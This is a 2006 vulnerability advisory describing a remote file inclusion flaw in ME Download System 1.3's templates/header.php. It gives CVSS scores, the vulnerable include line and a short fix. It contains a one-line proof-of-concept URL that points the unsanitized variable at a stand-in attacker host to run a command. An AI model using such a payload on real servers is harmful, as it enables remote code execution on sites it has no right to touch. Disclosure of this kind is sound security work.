ME Download System 1.3 Remote File Inclusion

2006.08.11
Risk: High
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 5.1/10
Impact Subscore: 6.4/10
Exploitability Subscore: 4.9/10
Exploit range: Remote
Attack complexity: High
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

+-------------------------------------------------------------------- + + ME Download System 1.3 Remote File Inclusion + +-------------------------------------------------------------------- + + Affected Software .: ME Download System 1.3 + Venedor ...........: http://www.ehmig.net/ + Class .............: Remote File Inclusion + Risk ..............: high (Remote File Execution) + Found by ..........: Philipp Niedziela + Original advisory .: http://www.bb-pcsecurity.de/sicherheit_282.htm + Contact ...........: webmaster[at]bb-pcsecurity[.]de http://www.bb-pcsecurity.de + Affected Files ....: templates/header.php + +-------------------------------------------------------------------- + + Code of /templates/header.php: + + ..... + <?php + include($Vb8878b936c2bd8ae0cab.'/settings_style.php'); + ..... + +-------------------------------------------------------------------- + + $Vb8878b936c2bd8ae0cab is not properly sanitized before being used + +-------------------------------------------------------------------- + + Solution: + Include config-File in header.php: + +-------------------------------------------------------------------- + + PoC: + http://[target]/templates/header.php?$Vb8878b936c2bd8ae0cab=http://evils ite.com?cmd=ls + +-------------------------------------------------------------------- + + Notice: + Maybe there are more RFI-Vulns in other files, but it's very hard + to read this code. + + Venedor has been contacted, but I didn't received any answer. + +-------------------------------------------------------------------- + + Greets: + Krini Gonzales + +-------------------------[ E O F ]----------------------------------


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top